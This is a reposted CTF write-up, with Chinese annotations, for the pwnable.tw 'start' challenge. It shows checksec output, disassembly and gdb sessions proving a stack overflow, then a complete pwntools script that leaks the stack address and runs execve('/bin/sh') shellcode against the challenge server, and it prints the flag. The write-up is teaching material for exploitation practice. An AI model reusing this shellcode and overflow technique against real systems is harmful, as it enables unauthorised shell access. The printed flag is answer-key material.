0x00
This message is shown once a day. To disable it please create the
/home/fekue/.hushlogin file.
fekue@LAPTOP-7LRFS4O3:/mnt/c/Users/hwjco/Desktop$ checksec start
[] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/fekue/.cache/.pwntools-cache-3.8/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[] You have the latest version of Pwntools (4.6.0)
[*] '/mnt/c/Users/hwjco/Desktop/start'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
fekue@LAPTOP-7LRFS4O3:/mnt/c/Users/hwjco/Desktop$
0x01
- 进入ida pro
public _start //_start函数
_start proc near
push esp //保持
push offset _exit //将_exit函数的地址压栈
xor eax, eax //eax置零
xor ebx, ebx
xor ecx, ecx
xor edx, edx
push 3A465443h //
push 20656874h
push 20747261h
push 74732073h
push 2774654Ch
mov ecx, esp ; addr
mov dl, 14h ; len
mov bl, 1 ; fd
mov al, 4
int 80h ; LINUX - sys_write
xor ebx, ebx
mov dl, 3Ch ; '<'
mov al, 3
int 80h ; LINUX -
add esp, 14h
retn
_start endp ; sp-analysis failed
0x03
0x04
gdb-peda$ x/20i $eip
=> 0x8048060 <_start>: push esp
0x8048061 <_start+1>: push 0x804809d
0x8048066 <_start+6>: xor eax,eax
0x8048068 <_start+8>: xor ebx,ebx
0x804806a <_start+10>: xor ecx,ecx
0x804806c <_start+12>: xor edx,edx
0x804806e <_start+14>: push 0x3a465443
0x8048073 <_start+19>: push 0x20656874
0x8048078 <_start+24>: push 0x20747261
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
0x8048087 <_start+39>: mov ecx,esp
0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
0x8048091 <_start+49>: xor ebx,ebx
0x8048093 <_start+51>: mov dl,0x3c
0x8048095 <_start+53>: mov al,0x3
0x8048097 <_start+55>: int 0x80
- 单步执行
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd054 ("Let's start the"...)
EIP: 0x8048087 (<_start+39>: mov ecx,esp)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048078 <_start+24>: push 0x20747261
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
=> 0x8048087 <_start+39>: mov ecx,esp
0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
[------------------------------------stack-------------------------------------]
0000| 0xffffd054 ("Let's start the"...)
0004| 0xffffd058 ("s start the CTF"...)
0008| 0xffffd05c ("art the CTF:\235\200\004"...)
0012| 0xffffd060 ("the CTF:\235\200\004\bp\320\377"...)
0016| 0xffffd064 ("CTF:\235\200\004\bp\320\377\377\001")
0020| 0xffffd068 --> 0x804809d (<_exit>: pop esp)
0024| 0xffffd06c --> 0xffffd070 --> 0x1
0028| 0xffffd070 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048087 in _start ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x0
EBX 0x0
ECX 0x0
EDX 0x0
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd054 ◂— 0x2774654c ("Let'")
EIP 0x8048087 (_start+39) ◂— mov ecx, esp
───────────────────────────────────[ DISASM ]───────────────────────────────────
0x804806e <_start+14> push 0x3a465443
0x8048073 <_start+19> push 0x20656874
0x8048078 <_start+24> push 0x20747261
0x804807d <_start+29> push 0x74732073
0x8048082 <_start+34> push 0x2774654c
► 0x8048087 <_start+39> mov ecx, esp
0x8048089 <_start+41> mov dl, 0x14
0x804808b <_start+43> mov bl, 1
0x804808d <_start+45> mov al, 4
0x804808f <_start+47> int 0x80
0x8048091 <_start+49> xor ebx, ebx
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd054 ◂— 0x2774654c ("Let'")
01:0004│ 0xffffd058 ◂— 0x74732073 ('s st')
02:0008│ 0xffffd05c ◂— 0x20747261 ('art ')
03:000c│ 0xffffd060 ◂— 0x20656874 ('the ')
04:0010│ 0xffffd064 ◂— 0x3a465443 ('CTF:')
05:0014│ 0xffffd068 —▸ 0x804809d (_exit) ◂— pop esp
06:0018│ 0xffffd06c —▸ 0xffffd070 ◂— 0x1
07:001c│ 0xffffd070 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 8048087 _start+39
gdb-peda$
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd054 ("Let's start the"...)
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd054 ("Let's start the"...)
EIP: 0x8048089 (<_start+41>: mov dl,0x14)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
0x8048087 <_start+39>: mov ecx,esp
=> 0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
0x8048091 <_start+49>: xor ebx,ebx
[------------------------------------stack-------------------------------------]
0000| 0xffffd054 ("Let's start the"...)
0004| 0xffffd058 ("s start the CTF"...)
0008| 0xffffd05c ("art the CTF:\235\200\004"...)
0012| 0xffffd060 ("the CTF:\235\200\004\bp\320\377"...)
0016| 0xffffd064 ("CTF:\235\200\004\bp\320\377\377\001")
0020| 0xffffd068 --> 0x804809d (<_exit>: pop esp)
0024| 0xffffd06c --> 0xffffd070 --> 0x1
0028| 0xffffd070 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048089 in _start ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x0
EBX 0x0
ECX 0xffffd054 ◂— 0x2774654c ("Let'")
EDX 0x0
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd054 ◂— 0x2774654c ("Let'")
EIP 0x8048089 (_start+41) ◂— mov dl, 0x14
───────────────────────────────────[ DISASM ]───────────────────────────────────
0x8048073 <_start+19> push 0x20656874
0x8048078 <_start+24> push 0x20747261
0x804807d <_start+29> push 0x74732073
0x8048082 <_start+34> push 0x2774654c
0x8048087 <_start+39> mov ecx, esp
► 0x8048089 <_start+41> mov dl, 0x14
0x804808b <_start+43> mov bl, 1
0x804808d <_start+45> mov al, 4
0x804808f <_start+47> int 0x80
0x8048091 <_start+49> xor ebx, ebx
0x8048093 <_start+51> mov dl, 0x3c
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ ecx esp 0xffffd054 ◂— 0x2774654c ("Let'")
01:0004│ 0xffffd058 ◂— 0x74732073 ('s st')
02:0008│ 0xffffd05c ◂— 0x20747261 ('art ')
03:000c│ 0xffffd060 ◂— 0x20656874 ('the ')
04:0010│ 0xffffd064 ◂— 0x3a465443 ('CTF:')
05:0014│ 0xffffd068 —▸ 0x804809d (_exit) ◂— pop esp
06:0018│ 0xffffd06c —▸ 0xffffd070 ◂— 0x1
07:001c│ 0xffffd070 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 8048089 _start+41
gdb-peda$
- 输入aaaaaaaaaaaaaaaaaaaaaaaa
gdb-peda$ r
Starting program: /home/giantbranch/pwn/start
Let's start the CTF:aaaaaaaaaaaaaaaaaaaaaaaa
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x19
EBX: 0x0
ECX: 0xffffd054 ('a' <repeats 15 times>...)
EDX: 0x3c ('<')
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd06c --> 0xffffd00a --> 0x0
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x61616161
[------------------------------------stack-------------------------------------]
0000| 0xffffd06c --> 0xffffd00a --> 0x0
0004| 0xffffd070 --> 0x1
0008| 0xffffd074 --> 0xffffd259 ("/home/giantbran"...)
0012| 0xffffd078 --> 0x0
0016| 0xffffd07c --> 0xffffd275 ("XDG_VTNR=7")
0020| 0xffffd080 --> 0xffffd280 ("XDG_SESSION_ID="...)
0024| 0xffffd084 --> 0xffffd292 ("CLUTTER_IM_MODU"...)
0028| 0xffffd088 --> 0xffffd2a8 ("XDG_GREETER_DAT"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x19
EBX 0x0
ECX 0xffffd054 ◂— 0x61616161 ('aaaa')
EDX 0x3c
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd06c —▸ 0xffffd00a ◂— 0x0
EIP 0x61616161 ('aaaa')
───────────────────────────────────[ DISASM ]───────────────────────────────────
Invalid address 0x61616161
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd06c —▸ 0xffffd00a ◂— 0x0
01:0004│ 0xffffd070 ◂— 0x1
02:0008│ 0xffffd074 —▸ 0xffffd259 ◂— 0x6d6f682f ('/hom')
03:000c│ 0xffffd078 ◂— 0x0
04:0010│ 0xffffd07c —▸ 0xffffd275 ◂— 'XDG_VTNR=7'
05:0014│ 0xffffd080 —▸ 0xffffd280 ◂— 0x5f474458 ('XDG_')
06:0018│ 0xffffd084 —▸ 0xffffd292 ◂— 0x54554c43 ('CLUT')
07:001c│ 0xffffd088 —▸ 0xffffd2a8 ◂— 0x5f474458 ('XDG_')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 61616161
Program received signal SIGSEGV (fault address 0x61616161)
gdb-peda$
eip已经被控制
0x04
from pwn import *
#context(log_level='debug',arch='i386',os='linux')
p=remote('chall.pwnable.tw',10000)
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
def leak():
p.recv()
payload='a'*20+p32(0x08048087) #0x08048087 => mov ecx esp
p.send(payload)
stack_addr=u32(p.recv(4)) #address of esp
# print hex(stack_addr)
return stack_addr
def get_pwn(addr):
payload='A'*20+p32(addr+20)+shellcode
p.send(payload)
p.interactive()
addr=leak()
get_pwn(addr)
FLAG{Pwn4bl3_tW_1s_y0ur_st4rt}
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
